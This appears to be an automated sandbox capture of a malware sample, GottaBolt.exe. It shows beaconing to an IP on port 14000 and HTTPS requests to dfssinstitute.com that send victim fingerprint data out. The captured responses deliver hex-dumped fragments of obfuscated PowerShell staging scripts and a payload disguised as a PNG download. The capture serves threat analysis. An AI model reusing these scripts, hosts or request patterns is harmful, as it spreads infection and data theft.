                                                                Nov 22, 2024 17:14:09.040275097 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:09.160006046 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:11.165292025 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:11.284804106 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:13.290497065 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:13.410278082 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:15.415335894 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:15.539235115 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:17.540304899 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:17.660459995 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:19.665311098 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:19.754741907 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:19.785840988 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:19.790417910 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:19.910121918 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:21.915323019 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:22.034967899 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:24.040302992 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:24.163598061 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:26.165370941 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:26.285547018 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:28.290370941 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:28.410418034 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:30.415330887 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:30.535183907 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:32.540324926 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:32.660077095 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:34.665322065 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:34.760852098 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:34.790196896 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:34.805974007 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:34.806278944 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:34.925925970 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:36.930951118 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:37.050801039 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:39.056062937 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:39.175754070 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:41.181401968 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:41.301048994 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:43.306165934 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:43.427269936 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:45.436523914 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:45.556334972 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:47.555962086 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:47.680196047 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:49.763820887 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:49.821611881 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:51.821711063 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:51.941457033 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:54.134147882 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:54.254046917 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:56.430998087 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:56.555258989 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:14:58.618643999 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:14:58.740360975 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:15:00.931018114 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:15:01.050884008 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:15:03.118565083 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:15:03.243654013 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:15:04.769479036 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:15:04.931027889 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:15:06.931030035 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:15:07.051172018 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:15:09.118594885 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:15:09.242882013 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:15:11.321657896 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:15:11.441344976 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:15:13.618527889 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:15:13.738202095 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:15:14.728001118 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:15:14.848128080 CET1400049786172.86.76.228192.168.2.5
                                                                Nov 22, 2024 17:15:16.852899075 CET4978614000192.168.2.5172.86.76.228
                                                                Nov 22, 2024 17:15:16.972430944 CET1400049786172.86.76.228192.168.2.5
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 22, 2024 17:11:44.866642952 CET5574053192.168.2.51.1.1.1
                                                                Nov 22, 2024 17:11:45.086390972 CET53557401.1.1.1192.168.2.5
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Nov 22, 2024 17:11:44.866642952 CET192.168.2.51.1.1.10x2e6dStandard query (0)dfssinstitute.comA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Nov 22, 2024 17:11:45.086390972 CET1.1.1.1192.168.2.50x2e6dNo error (0)dfssinstitute.com77.91.73.101A (IP address)IN (0x0001)false
                                                                • dfssinstitute.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.54971877.91.73.1014435760C:\Users\user\Desktop\GottaBolt.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-22 16:11:46 UTC162OUTGET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1
                                                                Host: dfssinstitute.com
                                                                Connection: Keep-Alive
                                                                2024-11-22 16:11:47 UTC158INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Fri, 22 Nov 2024 16:11:46 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                2024-11-22 16:11:47 UTC42INData Raw: 31 66 0d 0a 57 72 69 74 65 2d 48 6f 73 74 20 22 78 3d 39 35 34 34 2c 79 3d 32 34 39 32 2c 20 78 2b 79 22 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1fWrite-Host "x=9544,y=2492, x+y"0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.54971977.91.73.1014435760C:\Users\user\Desktop\GottaBolt.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-22 16:11:49 UTC138OUTGET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1
                                                                Host: dfssinstitute.com
                                                                2024-11-22 16:11:49 UTC158INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Fri, 22 Nov 2024 16:11:49 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                2024-11-22 16:11:49 UTC805INData Raw: 33 31 39 0d 0a 0d 0a 24 42 51 55 76 58 55 49 54 47 4a 44 48 57 6f 50 59 79 51 42 76 20 3d 20 24 4d 79 49 6e 76 6f 63 61 74 69 6f 6e 2e 4d 79 43 6f 6d 6d 61 6e 64 2e 4e 61 6d 65 20 2d 72 65 70 6c 61 63 65 20 22 2e 70 73 31 22 2c 22 22 0d 0a 24 66 6c 62 45 76 4f 6f 41 51 49 49 64 77 4f 6b 6b 5a 45 6b 57 20 3d 20 24 50 53 43 6f 6d 6d 61 6e 64 50 61 74 68 20 2d 72 65 70 6c 61 63 65 20 22 31 2e 70 73 31 22 2c 22 32 2e 70 73 31 22 20 0d 0a 24 66 6c 62 45 76 4f 6f 41 51 49 49 64 77 4f 6b 6b 5a 45 6b 57 32 20 3d 20 24 50 53 43 6f 6d 6d 61 6e 64 50 61 74 68 20 2d 72 65 70 6c 61 63 65 20 22 31 2e 70 73 31 22 2c 22 31 2e 74 78 74 22 0d 0a 0d 0a 74 72 79 7b 0d 0a 20 20 24 48 49 7a 57 56 73 68 58 70 55 52 41 58 45 68 57 58 41 6e 4d 20 3d 20 47 65 74 2d 53 63 68 65 64
                                                                Data Ascii: 319$BQUvXUITGJDHWoPYyQBv = $MyInvocation.MyCommand.Name -replace ".ps1",""$flbEvOoAQIIdwOkkZEkW = $PSCommandPath -replace "1.ps1","2.ps1" $flbEvOoAQIIdwOkkZEkW2 = $PSCommandPath -replace "1.ps1","1.txt"try{ $HIzWVshXpURAXEhWXAnM = Get-Sched


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.54972077.91.73.1014435760C:\Users\user\Desktop\GottaBolt.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-22 16:11:51 UTC138OUTGET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1
                                                                Host: dfssinstitute.com
                                                                2024-11-22 16:11:52 UTC158INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Fri, 22 Nov 2024 16:11:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                2024-11-22 16:11:52 UTC646INData Raw: 32 37 61 0d 0a 24 74 77 6b 6a 78 42 6d 79 67 4d 6b 78 61 77 53 61 44 69 67 62 20 3d 20 24 4d 79 49 6e 76 6f 63 61 74 69 6f 6e 2e 4d 79 43 6f 6d 6d 61 6e 64 2e 4e 61 6d 65 20 2d 72 65 70 6c 61 63 65 20 22 2e 70 73 31 22 2c 22 22 0d 0a 24 73 76 68 47 41 6b 78 73 62 46 64 47 75 6c 74 79 50 49 76 52 20 3d 20 24 66 61 6c 73 65 0d 0a 24 57 4f 59 73 62 79 65 53 70 44 4e 56 45 55 4d 55 41 75 45 68 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 54 68 72 65 61 64 69 6e 67 2e 45 76 65 6e 74 57 61 69 74 48 61 6e 64 6c 65 20 24 74 72 75 65 2c 20 28 5b 54 68 72 65 61 64 69 6e 67 2e 45 76 65 6e 74 52 65 73 65 74 4d 6f 64 65 5d 3a 3a 4d 61 6e 75 61 6c 52 65 73 65 74 29 2c 20 22 47 6c 6f 62 61 6c 5c 24 74 77 6b 6a 78 42 6d 79 67 4d 6b 78 61 77 53 61 44 69 67 62 22 2c 20 28 5b
                                                                Data Ascii: 27a$twkjxBmygMkxawSaDigb = $MyInvocation.MyCommand.Name -replace ".ps1",""$svhGAkxsbFdGultyPIvR = $false$WOYsbyeSpDNVEUMUAuEh = New-Object Threading.EventWaitHandle $true, ([Threading.EventResetMode]::ManualReset), "Global\$twkjxBmygMkxawSaDigb", ([


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.54972277.91.73.1014435760C:\Users\user\Desktop\GottaBolt.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-22 16:11:54 UTC138OUTGET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1
                                                                Host: dfssinstitute.com
                                                                2024-11-22 16:11:54 UTC158INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Fri, 22 Nov 2024 16:11:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                2024-11-22 16:11:54 UTC4299INData Raw: 65 34 36 0d 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 0d 0d 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 53 79 73 74 65 6d 0d 0d 0a 0d 0d 0a 46 75 6e 63 74 69 6f 6e 20 76 6a 78 79 4c 70 4e 6b 6f 77 57 7a 78 6c 6f 62 56 41 69 69 20 7b 0d 0d 0a 5b 43 6d 64 6c 65 74 42 69 6e 64 69 6e 67 28 29 5d 0d 0d 0a 20 20 20 70 61 72 61 6d 28 0d 0d 0a 20 20 20 20 20 20 20 20 20 5b 50 61 72 61 6d 65 74 65 72 28 4d 61 6e 64 61 74 6f 72 79 3d 24 74 72 75 65 29 5d 20 5b 53 74 72 69 6e 67 5d 24 47 48 46 2c 0d 0d 0a 20 20 20 20 20 20 20 20 5b 50 61 72 61 6d 65 74 65 72 28 4d 61 6e 64 61 74 6f 72 79 3d 24 74 72 75 65 29 5d 20 5b 53 74 72 69 6e 67 5d 24 62 74 73 0d 0d 0a 20 20 20
                                                                Data Ascii: e46Add-Type -AssemblyName System.DrawingAdd-Type -AssemblyName SystemFunction vjxyLpNkowWzxlobVAii {[CmdletBinding()] param( [Parameter(Mandatory=$true)] [String]$GHF, [Parameter(Mandatory=$true)] [String]$bts


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.54972977.91.73.1014435760C:\Users\user\Desktop\GottaBolt.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-22 16:11:56 UTC138OUTGET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1
                                                                Host: dfssinstitute.com
                                                                2024-11-22 16:11:57 UTC158INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Fri, 22 Nov 2024 16:11:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                2024-11-22 16:11:57 UTC42INData Raw: 31 66 0d 0a 57 72 69 74 65 2d 48 6f 73 74 20 22 78 3d 31 36 32 33 2c 79 3d 36 34 34 36 2c 20 78 2b 79 22 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1fWrite-Host "x=1623,y=6446, x+y"0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.54974477.91.73.1014434428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-22 16:12:03 UTC113OUTGET /?yjVsmHMwodfFGINSiCsv=YXuuqBFUVgMBaXsghdUv.txt HTTP/1.1
                                                                Host: dfssinstitute.com
                                                                Connection: Keep-Alive
                                                                2024-11-22 16:12:03 UTC293INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Fri, 22 Nov 2024 16:12:03 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 7432853
                                                                Connection: close
                                                                Content-Description: File Transfer
                                                                Content-Disposition: attachment; filename="YXuuqBFUVgMBaXsghdUv.txt"
                                                                Cache-Control: must-revalidate
                                                                2024-11-22 16:12:03 UTC16091INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 c1 00 00 05 c1 08 06 00 00 00 55 2d 57 79 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 ff a5 49 44 41 54 78 5e 1c 9d 77 38 96 ff fb 87 55 4a 42 1a 4a 19 a5 25 44 a5 68 68 a2 81 a4 84 10 45 53 52 a1 a2 84 92 15 8a a2 ad 48 2a 89 c8 2e 25 1a a8 a4 3e 5a 22 ab 45 2a ca 48 88 9c bf fb fb fb cb f3 c7 83 fb be df d7 f5 7a 9d e7 e1 38 1e 22 1b a7 5a 11 bf 54 9c 11 dd a9 fc 9e bb 9a 53 0b 6f b3 c3 ee 19 31 0d e3 f9 f6 44 1a 91 af ca ac 91 ca e3 50 ca 1c de 8c b9 c0 54 eb 8b 88 bb d7 a0 f8 e4 2c 8e 1b af f3 7e b6 38 2d ff be 52 14 fc 96 67 df 33 98 fb b9 0f 0e e6 c6 38 6d 9f 45 9f be 32 84 3d d8 cf
                                                                Data Ascii: PNGIHDRU-WysRGBgAMAapHYsodIDATx^w8UJBJ%DhhESRH*.%>Z"E*Hz8"ZTSo1DPT,~8-Rg38mE2=
                                                                2024-11-22 16:12:04 UTC16384INData Raw: c6 3a b5 37 3c dc 54 c9 9a 4c 0d 0c 32 b5 b8 b8 69 00 8b 56 a8 10 d4 37 9a c5 1a f6 e8 8f 2e a5 ef c5 bf 78 89 9f 60 87 5e 1d b9 db 0a 08 f9 54 c1 55 17 79 8a 0c 9e 61 2e be 9f 37 1f 35 f8 50 12 c6 3d 9f 2d b8 85 c7 f0 ed 6d 13 db c6 fa 11 1d ee 82 5e 7f 15 cc 4d b2 18 19 6f c6 b5 25 e1 42 f0 55 f2 fa f7 50 1e 9c f1 64 d7 b8 40 32 7e 3f 66 6b 6c 20 52 17 66 30 5c 10 c2 b0 11 7b 90 91 d9 82 d6 11 63 22 8d 0c 10 73 1b c5 8c 28 23 e6 4e ad e7 a5 d5 67 3a 9f bc 64 8f f9 3e 1c 6c 63 b1 db f7 8e ae f9 dd 94 7a 74 e2 7e 2f 09 d5 c5 cd 58 d4 bd a7 34 6c 1d 32 6f c6 b3 ee eb 56 6c fe 0e e6 e7 cc b3 54 1c ec cf c3 65 2a 48 cb 67 31 a5 58 82 b0 c0 3f 5c 9e ee 40 43 b8 0c e9 d7 3d b9 f0 6c 0e 63 2b 8d 18 71 69 3b 16 17 df 31 e9 e8 74 be aa cf e7 fe e6 33 24 4f 16 a7
                                                                Data Ascii: :7<TL2iV7.x`^TUya.75P=-m^Mo%BUPd@2~?fkl Rf0\{c"s(#Ng:d>lczt~/X4l2oVlTe*Hg1X?\@C=lc+qi;1t3$O
                                                                2024-11-22 16:12:04 UTC16384INData Raw: 6b 87 f1 dd c0 9a e5 12 77 69 97 28 22 59 cd 8d af 23 ae a2 a7 56 c0 09 9f f5 cc c9 5e 4c 49 d4 28 fc f5 bf 52 24 66 c7 cc 1f 2f 38 33 c6 1a 89 60 27 74 96 74 51 60 a4 2b b0 8b 19 ae fd 67 f2 5a 52 0e d9 f3 35 6c 69 0c e4 ed c1 e1 8c 95 a8 c0 a6 de 1d db aa 2c 9a 3e 9c 22 54 65 18 8e 87 57 f0 a1 cb 9c fb 3b 9b f0 d7 91 66 f6 ec dd 84 5f 6a 42 43 a4 83 d4 e9 f5 18 bd eb c3 d4 b5 5b b1 38 b6 89 f7 95 c5 fc 9e 7b 9f f9 73 97 f3 e3 4e 0d 59 ca 06 58 d4 0d c0 67 d2 34 16 49 e5 09 f3 77 8c 46 37 53 6c 22 a7 21 b5 f3 10 91 d5 5b f8 ac ac c7 c2 b8 18 de bf 39 c6 34 83 e1 0c 9a 97 40 ea bf 5b 38 05 17 30 f9 90 00 9e 9d 87 88 10 29 67 f5 bf 20 96 8b 09 f9 d7 be 8b d0 f1 f1 2c be f8 99 a0 40 2d 86 b8 de e2 72 f8 06 2e d4 c6 93 f2 77 2e 7d 9e 84 51 61 39 1f 85 df 3d
                                                                Data Ascii: kwi("Y#V^LI(R$f/83`'ttQ`+gZR5li,>"TeW;f_jBC[8{sNYXg4IwF7Sl"![94@[80)g ,@-r.w.}Qa9=
                                                                2024-11-22 16:12:04 UTC16384INData Raw: 11 44 de 8e 28 9e 7e 5a cb c0 33 c2 b3 e9 c9 a4 e9 52 18 a5 8f 0f 23 fe 7c 35 f7 5e 08 2c 35 62 3a b5 c1 2f 28 98 67 88 75 58 3f 2c 96 2c 64 ab e0 11 81 aa b5 42 56 de 23 d1 51 15 bd ed aa 42 9e 08 1c f7 27 9c 2d b7 e6 30 a0 bf 09 0f db cb 90 15 fa 3b b3 50 97 c2 07 ae bc 8f 94 61 6c f4 3f 6c 0a 66 31 73 f2 5f e1 5a b5 30 ec ab 4c bb d9 77 a1 ab a4 f1 5b d2 8e d9 c5 6a a6 52 84 e1 ec 68 3e 97 d9 62 ab de 44 de 85 d3 4c 5c 95 81 67 9d 2d ab 62 76 32 ee 49 2e 0e bb 7c b9 66 f4 84 bd 92 96 dc 35 8a c0 39 75 39 fa b5 7e 84 6f bf 42 df c7 6b 18 52 f4 98 9d 2b 74 b8 b3 a6 0f 13 14 77 51 96 a0 ca 9b 63 83 58 65 29 ca 76 af 10 66 8f 19 c8 8e d0 3e 20 cc b6 fd 6b 57 a4 9f 6f 42 e3 63 09 7c 14 a5 ba 70 3c 8b f4 dc 89 ca 48 66 50 a7 09 fb ba 3d c8 4d 68 65 58 c7 23
                                                                Data Ascii: D(~Z3R#|5^,5b:/(guX?,,dBV#QB'-0;Pal?lf1s_Z0Lw[jRh>bDL\g-bv2I.|f59u9~oBkR+twQcXe)vf> kWoBc|p<HfP=MheX#
                                                                2024-11-22 16:12:04 UTC16384INData Raw: 64 9d fa 26 b4 9e 74 e3 71 77 20 e2 db 24 f9 da 23 60 fd 3d 92 2c 2b f2 e4 98 f0 11 6a 34 2f b3 45 ff 36 53 fe bd c1 c4 d7 8a 1b 53 27 22 fb a4 91 6b da a9 b4 bd f4 c3 c5 b0 9c 74 05 2d 76 ae ee e3 c8 94 2f 82 dd bd 9c ad 6b 36 a0 72 d5 1f b3 87 c2 5c fa f5 89 bf 3a 87 f9 b1 f9 29 8d 7b 6e d2 39 ff 05 9f 2a c3 50 70 e8 e6 4f 5c 23 91 d7 1b b8 3d e5 08 47 64 c3 68 98 e8 4f f5 ef 83 8c fb e5 c6 5e 4d 37 9a b4 c7 f3 ec cf 6f 3a f2 ee 71 f2 7d 07 fa a1 69 7c d2 d9 c1 d8 f5 67 c8 5d 3e 1f 17 8b 42 b2 94 62 b1 6c ff 84 c5 c6 1b d4 04 77 f2 31 f8 2a 95 89 65 a4 18 cd e6 b6 8e 1f 1f 27 39 30 db a1 99 cb 6a 91 08 05 fc 66 88 d3 5c 54 9e 97 92 28 5f 4a 81 eb 59 7a 3a d6 e2 72 69 36 e5 93 23 b9 5e b2 81 4d 87 27 e0 69 6d 81 f8 f1 65 14 bd 7f 8a b3 82 60 3f e4 9f e4
                                                                Data Ascii: d&tqw $#`=,+j4/E6SS'"kt-v/k6r\:){n9*PpO\#=GdhO^M7o:q}i|g]>Bblw1*e'90jf\T(_JYz:ri6#^M'ime`?
                                                                2024-11-22 16:12:04 UTC16384INData Raw: fc 12 ba 9f d2 d0 f3 7d c6 da 97 82 41 be bc 54 70 ae b3 90 0d 17 dc bf 50 15 33 75 c4 89 f1 2d e2 64 ca 28 8e 78 c4 a2 b9 42 9e 15 e9 d9 1c aa 96 e1 de dd 27 1c ed 98 89 5b 9e 07 6f c6 af 43 71 a0 28 b9 13 ec e8 29 b2 c4 61 45 15 b5 e3 ba 48 f8 3c 86 4a 3f 43 ae 04 9d 62 e8 b5 af 78 47 ee 25 e5 60 1b d2 12 65 d8 6b fb e0 f8 ee 17 d2 ff 9a b8 3c 64 38 71 eb 02 68 12 88 c2 b9 a3 4b d8 f3 36 95 a8 f3 eb 28 f8 9f 54 e9 9a 70 ab 28 9e 22 2f 4f 46 95 44 31 c7 62 84 40 8c 5d b8 bf 4f 85 f9 d7 86 b3 58 5d 9c 1a e1 5b ac f9 5b c5 30 6d 67 ce 3d 8f 45 e4 d7 3d 9e 9b 89 91 b8 c0 9f b7 b6 a2 54 b5 e4 52 3d 44 8d d4 e9 a2 78 cc eb c0 54 f8 07 0a e2 a3 08 1a 73 92 01 7f fb 60 ad 1d cb 92 d5 50 fa f7 40 00 81 5f 91 98 b3 0e a1 55 ef e8 92 6a 60 55 5f 91 a0 ae ab e9 4a
                                                                Data Ascii: }ATpP3u-d(xB'[oCq()aEH<J?CbxG%`ek<d8qhK6(Tp("/OFD1b@]OX][[0mg=E=TR=DxTs`P@_Uj`U_J
                                                                2024-11-22 16:12:04 UTC16384INData Raw: 3b fb 22 9d dd 4a 63 c4 42 ee fd 3c 43 ae d8 5f 36 a7 ec a6 52 34 92 7e 9f 87 13 32 a0 86 34 1b 7b ac 55 e7 61 79 f5 34 93 07 8f e6 cd 91 68 b6 38 d9 a1 91 d9 40 f9 9b 8d 48 49 5e 63 63 98 35 33 ef 1d 67 50 de 71 be f6 b3 e0 d0 a5 65 2c 96 2b e0 f6 50 4b 96 14 f6 b0 7c bd 15 1d 59 0d 74 3c 9f 4a cd c6 c1 a8 78 4a 62 d2 28 c2 b0 2b f9 98 3d c8 c2 a5 38 87 4c ff a3 4c 7a f1 00 5b f9 33 6c 3a b4 06 75 b9 59 02 98 17 f1 7e eb 6f be 9d b8 4d c3 99 43 8c b0 bd cc 99 ce a7 6c 78 2a c6 fa 24 7f 64 05 11 f9 63 ed 4c ae 47 21 bf 9e ac c2 22 78 31 87 27 ce e1 ed a5 b5 b8 1c 99 47 8a 82 39 01 12 79 18 26 58 22 7f 36 89 15 b2 bb 38 16 65 c1 8c d8 75 44 39 cb d3 31 af 41 80 39 1d e6 d7 5f 61 d6 64 69 36 af d0 63 da 58 7f 8c 6a e4 e9 79 5c c5 8f a4 04 c4 cd ec 08 1c e5
                                                                Data Ascii: ;"JcB<C_6R4~24{Uay4h8@HI^cc53gPqe,+PK|Yt<JxJb(+=8LLz[3l:uY~oMClx*$dcLG!"x1'G9y&X"68euD91A9_adi6cXjy\
                                                                2024-11-22 16:12:04 UTC16384INData Raw: cb 18 e6 e9 8c 91 5f 0f a6 c2 3b dd 58 6e 4d c5 65 69 f4 2b 87 e0 b7 43 9a 24 f5 3f b4 7d 5b ce c6 e7 15 a8 ae 96 e3 9c c2 3b dc 57 3e 41 ba 26 8e 53 92 97 f1 8d 82 9f 1d 6b d9 d4 f4 96 b2 bb 33 c9 eb 88 61 d9 43 25 8a 0b d6 b3 58 ee 0b 69 da 75 3c 94 12 25 e7 46 03 c9 82 a0 ff 12 66 46 26 5a 91 1b 53 d3 a8 9e a1 8f dc 9a 72 ce 6d 91 45 4a 98 99 dd ee 53 a0 51 9d 4f b3 3a b1 de 2c 46 7a e1 10 46 05 85 61 b3 3f 84 ed 6e fb 99 a2 54 8e f5 ec d5 dc 18 99 c3 3f bb e7 7c a9 df 44 75 ff 0d 04 07 34 71 5a 7b 35 33 ac a6 50 7d eb 34 e7 2b ac b0 99 32 8d 1f 13 2c d9 7a 76 1f c3 cf 75 90 dd e0 84 9f 7a 1d 7f b5 7e a0 1a 53 c3 15 9f 30 2a 3f 5f e7 42 bd 33 0d d6 7b 68 4a 6b 24 f8 f3 16 b2 ee 44 e3 d4 5d 83 b7 fd 40 de de 6e 27 4d 66 04 f6 9a ab 28 bc 97 c1 42 91 e9
                                                                Data Ascii: _;XnMei+C$?}[;W>A&Sk3aC%Xiu<%FfF&ZSrmEJSQO:,FzFa?nT?|Du4qZ{53P}4+2,zvuz~S0*?_B3{hJk$D]@n'Mf(B
